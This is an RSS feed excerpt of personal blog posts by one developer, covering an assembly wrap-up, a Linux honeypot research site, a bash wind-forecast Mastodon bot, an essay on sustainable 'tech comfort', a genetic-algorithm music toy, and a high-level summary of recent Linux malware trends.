&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1hwuoj0k1rqzt55b5v57.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1hwuoj0k1rqzt55b5v57.gif" alt="person screaming" width="480" height="480"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, what conclusions can we briefly extract from these tests?&lt;/p&gt;

&lt;p&gt;Well, if we are using a high-level language we have to trust the compilation; if we are using a low-level one (like assembly) we are in control but, as humans, we might not be able to optimize it as well as a good compiler does, or to know in general how the low-level details of our compiling choices work.&lt;/p&gt;

&lt;p&gt;You might be asking yourself, does this really matter? In a world where even the smallest processing units are capable of running heavy stuff? In a situation in which we are at the peak of Moore's law?&lt;/p&gt;

&lt;p&gt;There are several answers to this. As it's amazingly put in &lt;a href="http://worrydream.com/ClimateChange/#funding" rel="noopener noreferrer"&gt;this article&lt;/a&gt;, there's an inherent responsibility in caring about even the smallest things as technologists (a word that I like waaay more than engineer, since tech and low-tech are made by several sorts of people). The hurry-up ways we've been procuring for years as a society are leveraging the climate issues, so it &lt;strong&gt;does&lt;/strong&gt; make sense to think about this. Don't get me wrong here, I'm not telling you "stop using random compilers and languages!" (also I use Python a lot! as well as other languages); what I'm saying is that it might be interesting to take into consideration what we are doing and what we are using to make our tech possible. Maybe explore different options and step over new ideas in different directions.&lt;/p&gt;

&lt;p&gt;There's something about exploring and trying new tech things that makes people excited, and there are certain tech-developers who take advantage of this wonderful feeling so to create more hurtful tech (for people and for the environment). What I'm saying is take that excitement and use it to explore new ideas, or old ideas from new perspectives so to make everything better! There are so many communities that are in need of this sort of exploration.&lt;/p&gt;

&lt;p&gt;So, the easy answer is, no, it doesn't really matter in terms of a single or a bunch of binaries calling stuff in a perfectly functional computer. All of the binaries and scripts above worked perfectly and, as a human, I didn't notice anything different among them in the performance. There were some tiny little differences though! which makes me think "how many other things are happening out there with my daily programs that I'm not noticing?" It's not really about efficiency here. It's about understanding a little bit more about what we are doing and how it works.&lt;/p&gt;

</description>
      <category>nasm</category>
      <category>assembly</category>
      <category>linux</category>
    </item>
    <item>
      <title>Linux security LAB Broken Spaceship</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Tue, 24 Oct 2023 08:37:20 +0000</pubDate>
      <link>https://forem.com/terceranexus6/linux-security-lab-broken-spaceship-5ep3</link>
      <guid>https://forem.com/terceranexus6/linux-security-lab-broken-spaceship-5ep3</guid>
      <description>&lt;p&gt;I've been slowly working in my free time in this Linux security sharing platform with a cute mascot and some educational purposes in mind, called &lt;a href="https://brokenspaceship.com/" rel="noopener noreferrer"&gt;Broken Spaceship&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;It's a research lab meant to share interesting security facts that I find, as well as the IoCs (indicators of compromise) from my honeypot. It's run by a free software spirit, so the &lt;a href="https://git.sr.ht/~alienagain/Broken-spaceship" rel="noopener noreferrer"&gt;repo&lt;/a&gt; is there for everyone to take a look. I intend to improve it, but the whole thing is kind of set up.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F22s7alqrfgn7xp0e076m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F22s7alqrfgn7xp0e076m.png" alt="the mascot, astronaut skull, showing their profile" width="669" height="705"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I intend to create a MISP in the future (an alpha version was already tested by some close, technical friends) but for now, apart from the &lt;a href=""&gt;website&lt;/a&gt;, the indicators are shared in:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://otx.alienvault.com/user/astronaut_skull/pulses" rel="noopener noreferrer"&gt;OTX Alien Vault&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://t.me/broken_spaceship" rel="noopener noreferrer"&gt;Telegram&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://line.me/R/ti/g/cXrELn3Yu6" rel="noopener noreferrer"&gt;LINE&lt;/a&gt; (Japanese)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://misskey.backspace.fm/@astronautskull" rel="noopener noreferrer"&gt;Misskey&lt;/a&gt; (Japanese)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8usuyo8dzkmkq982fr5y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8usuyo8dzkmkq982fr5y.png" alt="illustration of a toy spaceship" width="800" height="800"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I don't spam! just slowly sharing my passion :)&lt;/p&gt;

&lt;p&gt;I'm spending more time and focus on the &lt;a href="https://brokenspaceship.com/jp" rel="noopener noreferrer"&gt;Japanese version&lt;/a&gt; of the platform, but nevertheless the information is available in English, too.  &lt;/p&gt;

</description>
      <category>security</category>
      <category>linux</category>
    </item>
    <item>
      <title>Creating a simple wind forecast bot in Mastodon</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Fri, 06 Oct 2023 12:28:03 +0000</pubDate>
      <link>https://forem.com/terceranexus6/creating-a-simple-wind-forecast-bot-in-mastodon-i8l</link>
      <guid>https://forem.com/terceranexus6/creating-a-simple-wind-forecast-bot-in-mastodon-i8l</guid>
      <description>&lt;p&gt;I'm keeping a manual log (manual like in pencil and paper) of weather forecast in the mountain I like the most (Sierra Nevada). At some point I got interested in building scripts to help me out and I started sharing that information in Mastodon &lt;a href="https://mastodon.green/@SierraNevada" rel="noopener noreferrer"&gt;using a bot&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsyola2bbpnkzdlws6vqo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsyola2bbpnkzdlws6vqo.png" alt="illustration of Mastodon mascot walking on Sierra Nevada" width="399" height="399"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;First of all, a note on Mastodon bots. They are easy to set up, especially using the &lt;code&gt;toot&lt;/code&gt; command. I created an account, added the specification that says it's a bot, configured the authorization in &lt;code&gt;toot&lt;/code&gt; and got it running. Once I got there I created a simple weather parser so to be able to toot automatically the weather forecast in Mastodon.&lt;/p&gt;

&lt;p&gt;Then I started to learn about wind and I got interested in getting wind details easily so to note them down. I asked around my community and I got an answer: &lt;a href="https://open-meteo.com" rel="noopener noreferrer"&gt;open-meteo&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;While it has its limitations it worked perfectly for my purpose, a script to help me gather wind details through the day.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx73aod4qvm3jsqbfta1c.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fx73aod4qvm3jsqbfta1c.gif" alt="gif of a puppy being hit by the wind" width="272" height="272"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;First of all I used the interactive API to get the info that I wanted (Sierra Nevada, one day, wind details) into a CSV:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl "https://api.open-meteo.com/v1/forecast?latitude=37.095&amp;amp;longitude=-3.3969&amp;amp;hourly=temperature_2m,windspeed_180m&amp;amp;forecast_days=1&amp;amp;format=csv" &amp;gt; mywindtoday.csv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then I counted the total lines of the file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;lines=$(wc -l mywindtoday.csv | cut -d ' ' -f1|tr '\n' ' '
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I also created a variable for the line halfway through the values, discarding the first description lines (which are 5):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mdline=$((($lines/2)+5))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Between midnight (first line, 00:00) and the half of the file is morning, so I created a variable for morning:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mnline=$(( ($mdline/2)+5 ))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And between the half and the end it's evening, so I created another variable for that:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;eveline=$(( (($lines-$mdline)/2) + $mdline ))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The values that I want, starting with midnight, are hour and wind, so I parse the CSV looking for those values at the key daytimes I estimated before:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;midnight=$(csvcut -c 1,3 mywindtoday.csv | sed '5!d')
midnightdate=${midnight%,*}
midnighthour=${midnightdate#*T}
midnightwind=${midnight#*,}

morning=$(csvcut -c 1,3 mywindtoday.csv | head -n $mnline | tail -1)
morningdate=${morning%,*}
morninghour=${morningdate#*T}
morningwind=${morning#*,}

afternoon=$(csvcut -c 1,3 mywindtoday.csv | head -n $mdline | tail -1)
afternoondate=${afternoon%,*}
afternoonhour=${afternoondate#*T}
afternoonwind=${afternoon#*,}

evening=$(csvcut -c 1,3 mywindtoday.csv | head -n $eveline | tail -1)
evedate=${evening%,*}
evehour=${evedate#*T}
evewind=${evening#*,}

night=$(csvcut -c 1,3 mywindtoday.csv | head -n $lines | tail -1)
ngtdate=${night%,*}
ngthour=${ngtdate#*T}
ngtwind=${night#*,}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now all I had to do was save it all into a text document in a readable format:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;touch mywindtoot

echo "Detalles del viento en Sierra Nevada" &amp;gt;&amp;gt; mywindtoot
echo "A las $midnighthour de hoy,  $midnightwind k/h" &amp;gt;&amp;gt; mywindtoot
echo "A las $morninghour de hoy,  $morningwind k/h" &amp;gt;&amp;gt; mywindtoot
echo "A las $afternoonhour de hoy,  $afternoonwind k/h"&amp;gt;&amp;gt; mywindtoot
echo "A las $evehour de hoy, $evewind k/h"&amp;gt;&amp;gt; mywindtoot
echo "A las $ngthour de hoy, $ngtwind k/h"&amp;gt;&amp;gt; mywindtoot
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And, if I wanted to toot it:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;toot post "$(cat mywindtoot)"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or if I just wanted to read it in the terminal, I just &lt;code&gt;cat&lt;/code&gt; it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Detalles del viento en Sierra Nevada
A las 00:00 de hoy,  15.8 k/h
A las 09:00 de hoy,  8.0 k/h
A las 14:00 de hoy,  19.5 k/h
A las 18:00 de hoy, 2.2 k/h
A las 23:00 de hoy, 14.1 k/h

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Finally a little clean up:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rm mywindtoot
rm mywindtoday.csv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And that's it! &lt;a href="https://mastodon.green/@SierraNevada/111187890324269047" rel="noopener noreferrer"&gt;My first test using it in Mastodon&lt;/a&gt; worked just fine. You can check the whole code &lt;a href="https://git.sr.ht/~alienagain/SierraNevada/tree/master/item/src/wind.sh" rel="noopener noreferrer"&gt;here&lt;/a&gt;. Why don't you try to build something similar for your city? Maybe share with your neighborhood.&lt;/p&gt;

</description>
      <category>bash</category>
      <category>mastodon</category>
      <category>weather</category>
      <category>scripting</category>
    </item>
    <item>
      <title>Tech Comfort</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Thu, 05 Oct 2023 18:01:11 +0000</pubDate>
      <link>https://forem.com/terceranexus6/tech-comfort-3pga</link>
      <guid>https://forem.com/terceranexus6/tech-comfort-3pga</guid>
      <description>&lt;p&gt;The first time I realized about the "&lt;em&gt;tech comfort&lt;/em&gt;" thing was the time I was given a Linux and a reason for being given a Linux.&lt;/p&gt;

&lt;p&gt;But let me explain.&lt;/p&gt;

&lt;p&gt;Science Fiction inspires a lot of scientists and developers into building and feeling comfort with technology. At some point I believe what we watched and read sometimes guided us into feeling one way or another towards technology.&lt;/p&gt;

&lt;p&gt;I think a lot about this when I see some tech over there and I ask myself "&lt;em&gt;but why?&lt;/em&gt;" and sometimes the answer is that it's flashy and we are facing a lot of uncomfortable things in our daily life, things that escape our reach, and we just want to feel comfort in those flashy techie things, since it reminds us of fun "&lt;em&gt;sci-fi&lt;/em&gt;". &lt;/p&gt;

&lt;p&gt;There was a huge life-changing moment in my life when I started reading Ursula K. Le Guin. Until then, as a sci-fi lover I was excusing tons of things that I saw that were uncomfortable, trading them with the joy that the rest of the story would bring me. But then I found a spot of sense, complexity and human rights blended with scifi I didn't quite encounter before in the same way. It was a very similar comfort I found when I saw "Princess Mononoke" or "Nausicaä", and it wasn't until very recently (few years) that I found out about the concept of solarpunk.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcrkvwt2ivjfc6uclgnfu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcrkvwt2ivjfc6uclgnfu.png" alt="Image description" width="800" height="545"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Going back to tech, which is our deal over here, I studied an expertise in electronics back there in the computer engineering degree. I must say my whole interest in programming and computing when I was a kid was towards androids and replicants and the concept of machines thinking by themselves, but at some point I just lost interest in that because I discovered things like digital rights, repairing and building things from other things. Electronics felt like crafting, and I just got into it. By that time I started working as a programmer and got in contact with classmates and coworkers who enjoyed programming and tech just because. I think a lot of us can relate. Yet at that time I felt "something's not right".&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;My first question before continuing with this article is, have you felt like that as well? have you felt that tiny little "this is not quite right but I don't know why" feeling?&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Anyway, while I started working in a completely different field, I enjoyed using my electronics knowledge in stories. I've been writing scifi since I was a teenager, and I still do. At some point I just needed to feel the same comfort I found in solarpunk works, so I started writing and thinking towards that. I thought "hey this is not that impossible tbh", and I started asking around my community about it, and &lt;a href="https://sr.ht/~alienagain/relatos-56k/" rel="noopener noreferrer"&gt;some people showed their writings&lt;/a&gt;, too. I discovered then some other people are trying to &lt;strong&gt;live&lt;/strong&gt; like that, and then I got towards minimal computing and toning down tech. At this point I was questioning myself, "how much of this makes sense in our daily life?" and it's been a really complex question that I'm still working towards. Until now all I got clear was the fact that it makes sense to keep the "this is not right" feeling alive, as a way of pinching myself to look for -general- comfort on tech.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;What is comfort for a person growing up in a climate crisis?&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;I discovered, after reading other people's ideas, and spending time wondering on my own that this sort of tech makes sense only if the community and the society it evolves in think towards the values of co-work, empathy and constant reviewing. This is not an original idea at all. Susan Leigh Star and others of her colleagues in the field of sociology towards information in modern society came to the conclusion that there are many invisible elements in society that are critically needed to make everything work the way it works, and understanding how some of those elements work together (even if they don't even know themselves) is the way of changing unfair or uncomfortable actions (she for example researched feminism in those terms). Feelings of comfort are just feelings, but a community of people caring for each other's comfort makes a lot more tangible sense. Therefore, sustainable technology only makes sense in a sustainable context: using solar power panels to partially fuel a massive data center that requires tons and tons of clean water in a country under drought doesn't make sense, but when you only see the solar panel thing, it maybe looks like it does, because as a developer or as a user, you might relate it with a fast response in a platform. Depending on your values maybe even the water thing, because what could we do about it?&lt;/p&gt;

&lt;p&gt;I recently worked -slowly- towards the goal of reading off-line. Turns out I'm the "I need to check this a lot of times" kind of person, and every time we click and load a site (and even more nowadays) we are asking for adverts, data collecting, statistics and more. Apart from the fact that this makes me uncomfortable it takes a really long time, while if downloading it once, I can check it whenever I need. It seems awfully obvious but I got in the "everything is online all the time" train and I forgot about that, until I read about &lt;a href="//100r.co"&gt;a couple of people&lt;/a&gt; who live in a boat and needed to download texts a lot so to be able to read or enjoy those, because Internet doesn't always work. I'm absolutely not in that situation but I'd hate to feel anxious about not having Internet connection, or not being able to access critical info if somehow I lost my Internet connection, so I've been slowly working towards this. Would you feel anxious if you didn't have Internet for a long while?&lt;/p&gt;

&lt;p&gt;Anyway, I found a really interesting project called "&lt;a href="https://geminiprotocol.net/" rel="noopener noreferrer"&gt;Gemini protocol&lt;/a&gt;" that is thought and built with this sort of question in mind. All about using simple, straightforward resources and linking images or media instead. There are many ways of browsing the contents, my favorite is &lt;a href="https://github.com/makew0rld/amfora" rel="noopener noreferrer"&gt;amfora&lt;/a&gt;, an in-terminal application, but there are others.&lt;/p&gt;

&lt;p&gt;What I want to say is that tech is a tool, a method to reach and build something else, and what we make with it is a statement. I've learnt about it through the Free Software community, but somehow I think it's more than just sharing and explaining, it's about thinking what we've built and, maybe, start over at some point (even if it looks like stepping backwards in terms of "productivity") since it might be the key of building a more comfortable way of understanding and interacting with technology, the type of comfort that has to be thought slowly, in community, sometimes offline.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;When someone points out the new techie trend is not sustainable, what do you think? do you think "party killer"? if so, how attached are you to that tech?&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;I usually confront this feeling, as a techie person myself. But I'm also given that answer when I try to justify changes in Free software communities for supporting feminism and sustainability, moving the focus to the context of people instead of tech (though I must say most of the people are wonderful and regardless if they agree or not they try to discuss in a friendly open way). I love programming, I love trying new things, I love confronting technical challenges, yet I don't want those feelings to get the shape of productivity and tech-empowerment above everything else. I somehow want to spend a lot of time, sometimes months thinking about the shape of digital elements in life.&lt;/p&gt;

&lt;p&gt;In a story I'm writing, the main character (a researcher in a moon with an extreme weather) is meant to do a scientific research. Somehow I imagined a cranky computer, e-paper screen, with a sliding keyboard that she sort of releases from the wall, in which she uses an IRC and a repo to talk to her peers. She uses some sand and solar batteries to make that and the electronics for the research work. This made me feel happy, as weird as it sounds.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feemogg7qpgakbafhcs5p.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feemogg7qpgakbafhcs5p.png" alt="illustration of a girl typing a cranky computer in a room with a window that seems to have a couple of suns" width="800" height="800"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In another story that I wrote, the main character is a weather analyst, what is called "Clouds" in a future Al-Andalus shaped society (the past society that used to live where I was born), and people are used to download off-line maps and text from local docks in libraries and trains. And this made me happy, again as weird as it sounds. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb5zczl9rb59ofzcgtt0x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb5zczl9rb59ofzcgtt0x.png" alt="A person is sleeping over a table, with an e-reader connected to a -what it seems- usb port" width="800" height="800"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But what I feel is or is not "happy tech" is not important, actually.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;What sort of technology makes &lt;strong&gt;you&lt;/strong&gt; happy? Have you ever stopped to think why? &lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Maybe spending some time asking yourself that is nice, there's no rush really. Sometimes social media makes us think there's rush. On that, on everything; There isn't. &lt;/p&gt;

&lt;p&gt;But it might be an interesting exercise, so to understand why we are doing what we are doing. Our digital actions, as users or as developers, have consequences. Are we having a choice upon those actions? Should we be having more?&lt;/p&gt;

</description>
      <category>opinion</category>
      <category>tech</category>
      <category>solarpunk</category>
    </item>
    <item>
      <title>TinEAR, using GA for music inspiration</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Thu, 28 Sep 2023 10:32:25 +0000</pubDate>
      <link>https://forem.com/terceranexus6/tinear-for-using-ga-for-music-inspiration-327k</link>
      <guid>https://forem.com/terceranexus6/tinear-for-using-ga-for-music-inspiration-327k</guid>
      <description>&lt;p&gt;I'm very interested in art experimentation as well as tech and sustainability. I recently participated in a live programming workshop meant for music creation. One of the guys conducting the workshop mentioned the fact of slight imperfections (usually not noticeable by the human regular ear) of human artists against programmed music. Somehow this made me think of how some imperfections lead to more interesting works than the one that was previously attempted. How could I work around a terminal toy that was "imperfect" in its attempts to play music?&lt;/p&gt;

&lt;p&gt;I'm very interested in sustainability and de-escalating tech resources, so I refused to work towards AI, but I thought of working with GA. The idea is for the toy to attempt to reach a collection of notes, each attempt closer, but not quite until it reaches the correct ones.&lt;/p&gt;

&lt;p&gt;In order to do &lt;a href="https://git.sr.ht/~alienagain/TinEar" rel="noopener noreferrer"&gt;this&lt;/a&gt; I chose python3 and a very simple GA structure, the same that would try to guess a word. &lt;/p&gt;

&lt;p&gt;This is an example usage:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;python3 tinear.py
TARGET: AABC
MAXIMUN GENERATIONS ALLOWED: 7

Generation: 1   String: AACC    Fitness: 1
Generation: 2   String: AABC    Fitness: 0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this case it was lucky and guessed the right one the second time (generation 2). In order to play music directly from the terminal, I use &lt;code&gt;os.system&lt;/code&gt; defining a command with variable chords (the ones asked to the user at the execution) and &lt;code&gt;play -n synth pl&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The result is that with each guess, the terminal plays the attempted tune, making it fun when doing some live coding jams.&lt;/p&gt;

&lt;p&gt;I mixed the tinear attempts with some synthesizer tunes using teenage engineering devices and created some imperfect, yet fun music! You can find the script &lt;a href="https://git.sr.ht/~alienagain/TinEar/tree/master/item/src/tinear.py" rel="noopener noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>geneticalgorithms</category>
      <category>ga</category>
      <category>music</category>
      <category>art</category>
    </item>
    <item>
      <title>Hello back! Sharing some projects</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Wed, 27 Sep 2023 13:34:53 +0000</pubDate>
      <link>https://forem.com/terceranexus6/hello-back-sharing-some-projects-2h2i</link>
      <guid>https://forem.com/terceranexus6/hello-back-sharing-some-projects-2h2i</guid>
      <description>&lt;p&gt;もっと日本語ともっとCYBERSECURITYを勉強だから数年前にここに書くのをやめましたいま私は現在6年のサイバー脅威の専門家です日本へいきましたそれから私の日本語と私の実務経験は前回よりも優れています&lt;/p&gt;

&lt;p&gt;新しいプロジェクトに向けて取り組んでいます! &lt;br&gt;
それを共有したい&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ib9zc2ljxojm88b0hcs.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ib9zc2ljxojm88b0hcs.jpeg" alt="Small penguin cutely walking on the ice" width="800" height="532"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Cutting-edge research on Linux cyber threats
&lt;/h2&gt;

&lt;p&gt;I researched Linux cyber threats for one year. To do that, I first used a Cowrie honeypot... &lt;a href="https://git.sr.ht/~alienagain/honeypot_notes" rel="noopener noreferrer"&gt;This link&lt;/a&gt; is its repository.&lt;br&gt;
I presented that research at three events (in Spanish and English).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://otx.alienvault.com/user/astronaut_skull/pulses" rel="noopener noreferrer"&gt;AlienVaultで結果を公開しました&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftfywgbh850z0cdoa86db.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftfywgbh850z0cdoa86db.png" alt="screenshot of alienvault site" width="800" height="370"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In 2022 cryptominers became popular, but in 2023 stealers became more popular than cryptominers.&lt;br&gt;
Also, malware has become more complex.&lt;/p&gt;

&lt;p&gt;For example, here are some TTPs I have seen recently:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Telegram bots used as Command&amp;amp;Control (&lt;a href="https://attack.mitre.org/techniques/T1102/002/" rel="noopener noreferrer"&gt;T1102.002 MITRE&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Theft of 2FA tokens, SMS for example (&lt;a href="https://attack.mitre.org/techniques/T1111" rel="noopener noreferrer"&gt;T1111 MITRE&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Anti-VM (VM evasion) (&lt;a href="https://attack.mitre.org/techniques/T1497" rel="noopener noreferrer"&gt;T1497 MITRE&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So, recent campaigns include ransomware (Cyclops, Conti), stealers (The White Snake), toolkits (Reptile) and others.&lt;/p&gt;

&lt;h2&gt;
  
  
  STEALERS
&lt;/h2&gt;

&lt;p&gt;Stealers for Windows, Linux and macOS are becoming popular.&lt;br&gt;
Some ransomware no longer uses encryption; it only steals data.&lt;/p&gt;

&lt;p&gt;Right now some popular stealers are Meduza, Racoon, Redline, Bandit, NodeStealer and Vidar.&lt;br&gt;
You can partly see this &lt;a href="https://any.run/malware-trends/" rel="noopener noreferrer"&gt;here&lt;/a&gt;. For example, those statistics say that &lt;a href="https://any.run/malware-trends/redline" rel="noopener noreferrer"&gt;the amount of Redline&lt;/a&gt; is increasing.&lt;/p&gt;

